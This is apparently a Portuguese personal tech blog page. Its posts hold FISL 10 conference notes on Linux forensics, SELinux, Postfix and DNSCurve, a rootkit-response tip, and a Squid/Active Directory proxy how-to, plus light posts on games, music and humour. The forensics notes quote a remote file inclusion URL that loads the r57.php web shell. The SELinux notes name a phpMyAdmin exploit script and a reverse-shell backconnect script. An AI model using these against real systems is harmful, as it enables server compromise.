Everlinux’s Blog

Segue algumas anotações realizadas no FISL 10. Qualquer dia eu organizo isso melhor

# Forense em Linux - http://eriberto.pro.br
- Insert Linux Live CD Forense ~ 60 MB.
- Usar Sleuthkit - http://www.sleuthkit.org/sleuthkit/
- Usar ls -lua e ls -lta para ver a data de modificação dos arquivos
- Montar dump de imagem com “RO” e nunca passar fsck
- chkrootkit -r /forense
- rkhunter -c -r /forense
- freshclam; clamav -r /forense
- Usar strings + grep por data (apache) ou comandos (rm) em dd de disco/mem
- find /forense -mtime -2 => arquivos suspeitos alterados recentemente
- fopen de URL no PHP pode permitir download de um arquivo para o /var/tmp
- site.com/lalala?http://shellremota.com/r57.php
- r57.php te dá uma shell remota (push com resposta 200 nos logs - OK)

The Sleuth Kit (previously known as TASK) is a collection of UNIX-based
command line file system and media management forensic analysis tools.
The file system tools allow you to examine file systems of a suspect
computer in a non-intrusive fashion. Because the tools do not rely on
the operating system to process the file systems, deleted and hidden
content is shown.

# KVM - glommer AT redhat.com
- Sw virtual?
- GFS?
- guestfish = disaster recovery en VM (editar menu.lst e etc)

# Varnish - Squid like globo.com
- Usar o webpoligraph para gerar stress stest/ analise de resultados

# Selinux - jczucco AT gmail.com
- http://jczucco.blogspot.com/ e http://ulissescastro.wordpress.com/
- type_t = template para apache, mysql e etc
- setenforce 1; sestatus
- exploit no phpmyadmin - phpmyadminrce.sh
- backconnect - bc.pl para abrir conexão reversa

# Miguel Ciurcio Filho - http://www.ic.unicamp.br/~miguel
- HELO com IP deve ser negado, embora tenha RFC dizendo o contrário
- PTR e A register must match
- smtpd_client_connection_rate_limit = 15
- smtpd_client_connection_count_limit = 10
- smtpd_client_message_rate_limit = 25
- Usar somente a SpamHaus (best ever)
- smtpd_hard_error_limit = 3
- smtpd_soft_error_limit = 1
- smtpd_error_sleep_time = 20s
- FDQN com nome da máquina não vale

# DNS Curve - D.J. Bernstein
- High-Speed with Cryptography
- Sourceforce uses nginex
- Criptografia https difícil e lenta
- Would massively overload servers
- Confidentiality despite Espionage
- Integrity despite Corruption
- Availability despite Sabotage
- Uses 4096 bit encryption / signatures
- 50 bilion packet/day to 500 milion cliets with 2.4 Core 2 Quad
- Total load on .com:
- 38 bilion packet/day from 5 milion clients
- Crypto per group not per query
- DNSSEC uses 640-1024 bit RSA for fast signature verification
- DNSSEC on *.sec2.br foi quebrado 23/26 domínios “protegidos”

Mantendo a tradição, estamos indo novamente ao 10º FISL, em Porto Alegre

Como sempre, deixando tudo para a última hora… pegando os vôos mais bizarros e hospedando-se nos hotéis mais estranhos :-p

Ainda preciso mitigar o restante do dia de trabalho, passar minhas tarefas para os que ficam, fazer as malas e atravessar a cidade para o Aeroporto de Guarulhos… As vezes eu me pergunto porque eu ainda faço isso tudo, somente para não perder a festa da padroeira dos Nerds :-p

Dê uma olhada na programação e venha assistir palestras como essas:

The DNS security mess
DNSCurve X DNSSEC
Forense computacional em Linux
Projeto de lei de cibercrimes
Configurações práticas IPv6 no Linux e FreeBSD - Firewall, Túneis, DNS e outros serviços
DDOS – ataques e prevenções
Tecnicas Avançadas de Segurança com Iptables
SELinux For Everyday SysAdmins
Usando ntop+Kernel Bridging p/ Análise e Caracterização de Tráfego

A gente se encontra lá!!!

Direto do Blog do Luciano Borguetti, uma excelente narrativa:

”
Possible t0rn v8 \(or variation\) rootkit installed

… o que fazer quando descobrimos que um servidor GNU/Linux foi comprometido?
Nesse post vou mostrar uma pequena análise de um servidor comprometido por uma rootkit.”

Lembre-se: O Chkrootkit e o RKHunter são reativos (após a nhaca).

Já o brasileiro OSSEC pode ser instalado antes da merda acontecer

Complementando:

Caso o servidor já esteja comprometido, o ideal é copiar alguns binários de uma máquina sadia (awk, cut, echo, egrep, find, head, id, ls, netstat, ps, strings, sed, uname) para um CD/DVD/Pendrive e pedir para que o chkrookit use estes binários, visto que os resultados que a máquina gerar pode não ser verdadeiro.

Rodaria o chkrootkit mais ou menos assim:

# ./chkrootkit -p /cdrom/bin

Ou então, usar um live-cd e alterar o rootdir:

# ./chkrootkit -r /mnt/sysrescue

O My Brute é um jogo de batalhas RPG online. Ideal para quem não tem tempo para se dedicar a jogos.
É um jogo de luta bastante simples. Basta criar um personagem, escolhendo nome, aparência e a cor do seu guerreiro. Todo dia você tem direito a três lutas, onde é possível escolher seu adversário ou até mesmo procurar um oponente especifico. A batalha é totalmente automática, e vence o lutador com as melhores habilidades.

Se liga, meu avatar ( MiniHacker ) ganhando de um carinha – Perfect Win rss:
Que tal tentar a sorte me desafiando?

Divulguem seus Brutes nos comentários.

Para quem ainda não conhece, gostaria de sugerir dois Sons de uma banda que gosto muito: Os Seminovos.

Esta música chama-se “Escolha já seu nerd” e é mais recente. É dedicada à todas as mulheres que convivem com este ser estranho, que só sabe usar o lado lógico do cérebro e tem seu lado emocional pouco desenvolvido

Trecho da música:

Enquanto o bonitão tá na balada te chifrando /
O nerd com certeza está em casa estudando /
O curso superior do gostosão tá no início /
E o nerd ganha em dólar no Vale do Silício

Esta segunda música eu também gosto muito, chama-se “Ao Mestre Com Carinho”. Escute a música, preste atenção na letra e divirta-se com as animações que passam enquanto o som vai rolando

Estava com o pessoal do trabalho batendo um papo sobre a real forma de crescer e progredir profissionalmente. Depois de muitas opiniões, fica abaixo o resumão de toda conversa:

Quem trabalha muito, erra muito.
Quem trabalha pouco, erra pouco.
Quem não trabalha não erra.
E quem não erra é promovido!

.
rsrs….faz ou não sentido!??
8p

Se você já perdeu horas brincando no Google Earth e/ou no Google Maps, você não pode deixar de conhecer esses dois sites Street View Hacks e o “StreetViewr“. Eles reunem imagens no mínimo curiosas e inusitadas.

Para quem não conheçe o Google Street View permite a visualização ampla de diversas ruas do mundo inteiro. Com vistas panorâmicas de 360° na horizontal e 290° na vertical, as imagens conseguem atingir um bom nível de detalhamento. Tantos são os detalhes que o programa chega a flagrar com clareza algumas situações curiosas.

Veja algumas imagens curiosas registradas pelo Google Maps.

Outro site legal é o GoogleSightSeeing que mostra imagens vistas pelo ângulo do satélite.

Dica rápida, sem muitas novidades. Apenas uma forma rápida de colocar um Squid 2.6.18 rodando em um Ubuntu 8.04 LTS para autenticar em um Windows 2003 Server, sem usar samba+winbind, dar join no domínio, usar ntp e etc.

A idéia é documentar uma árvore LDAP padrão do Windows, para servir como base para futuras implementações, visto que muitos admins de AD desconhecem esta informação

No squid.conf, ficaria mais ou menos assim (o “\” é uma quebra de linha, porém o comando deve ficar em uma linha única):

...
acl diretoria src 10.10.10.9/32
http_access allow diretoria
 
# Autenticacao AD Windows
auth_param basic program /usr/lib/squid/ldap_auth -R -b "dc=dominio" -D "cn=tiago \
cruz,cn=users,dc=dominio" -w "senha" -f sAMAccountName=%s -h 10.10.10.10
auth_param basic children 5
auth_param basic realm Autenticacao
auth_param basic credentialsttl 5 minutes
acl ldapauth proxy_auth REQUIRED
http_access allow ldapauth
 
# White List
acl liberados dstdom_regex -i "/etc/squid/unblock.txt"
http_access allow liberados
...
# Rede Local LAN
acl rede_local src 10.10.10.0/24
http_access allow rede_local

Caso não funcione “de prima”, recomendo estes comandos para debugar o problema:

1-) Usando o LDAPSearch para ver se retorna OK:

$ ldapsearch -LLL -h 10.10.10.10 -P 3 -x -D "CN=Tiago Cruz,CN=Users,DC=Dominio" \
-W -b "DC=Dominio" "(&(&(objectClass=User)(objectCategory=Person))(sAMAccountName=tcruz))"
Enter LDAP Password: 
dn: CN=Tiago Cruz,CN=Users,DC=dominio
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Tiago Cruz
sn: Cruz
givenName: Tiago
initials: ti
distinguishedName: CN=Tiago Cruz,CN=Users,DC=dominio
instanceType: 4
whenCreated: 20090427110042.0Z
whenChanged: 20090427190603.0Z
displayName: Tiago Cruz
uSNCreated: 555987
....

2-) Simulando o LDAP_AUTH do Squid na mão, passando na mesma linha usuário e senha desejado para ver se funciona bem:

$ /usr/lib/squid/ldap_auth -R -b "dc=dominio" -D "cn=tiago \
cruz,cn=users,dc=dominio" -w "senha" -f sAMAccountName=tcruz -h 10.10.10.10
tcruz senhacorreta
OK
tcruz senhaerrada
ERR Success

Lembrando que se você estiver usando Proxy Transparente, você deverá configurar o endereço do Proxy diretamente no navegador do usuário pois a autenticação não funcionará.

Se você não sabe se usa Proxy Transparente, seria algo mais ou menos assim:

# No squid:
http_port 3128 transparent
 
# No firewall:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -t nat -A PREROUTING -s 10.10.10.0/255.255.255.0 -p tcp --dport 80 -j REDIRECT --to-port 3128

A idéia é pegar todo o tráfego que vem da sua rede local com destino à porta 80/tcp e encaminhar para o squid na porta 3128/tcp, de forma transparente. Funciona muito bem, mas caso você queira autenticação será necessário mexer no browser no cliente.

Para fazer uma configuração automática, sugiro a utilização de um Script de Logon mais ou menos como este arquivo “todos.bat”:

@echo off
net use f: \\server\shared
net use h: /home
regedit /s \\server\netlogon\proxy.reg

Sendo que o proxy.reg seria algo mais ou menos assim:

REGEDIT4
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"="10.10.10.1:3128"
"ProxyEnable"=dword:00000001
"EnableAutodial"=dword:00000000
"NoNetAutodial"=dword:00000000
"MigrateProxy"=dword:00000001

Mais informações:
- Configuring Squid on Linux to authenticate with Active Directory
- Configuring a Squid Server to authenticate off Active Directory
- Squid autenticado no Active Directory com Winbind
- Autenticando o SQUID no Active Directory via NTLM
- SaMBa 3.x -> Tudo o que você precisa saber (e não tinha para quem perguntar

Abraços e até a próxima!

Essa é a nossa homenagem a todos os trabalhadores que querem se vingar do seu chefe.

Se você passou a infância jogando Mortal Kombat, vai se identificar com os “Fatalities” oferecidos pelo game

Leandro - MiniHacker

A Red Hat, juntamente com a Georgia Tech Mapping Open Source, disponibilizou um estudo conduzido em 75 países. O estudo designado Open Source Index (OSI), pretende medir a atividade mundial do software livre. Foram levados em consideração fatores dos países como políticas em setores como Governo, indústria e comunidade.

Os resultados demonstram uma distribuição bem definida, do software Open Source pelo mundo.

O estudo com os resultados, que também se encontra numa representação no Google Maps, que tem o intuito de mapear a utilização dos softwares livres e open source e sua atividade, numa perspectiva interessante que pode ser aproveitada por estudos academicos ou de mercado. Segundo a informação presente na FAQ da Red Hat sobre o estudo, os dados têm algum valor especulativo.

“Mesmo um país que não tenha um alto grau de penetração de open source, pode ter um número elevado número de usuários na Internet e ser possuidor de patentes na área de tecnologias de informação. Estes fatores podem indicar um ambiente favorável, para este software poder ser divulgado.”

Acesse o mapa com as Atividades Open Source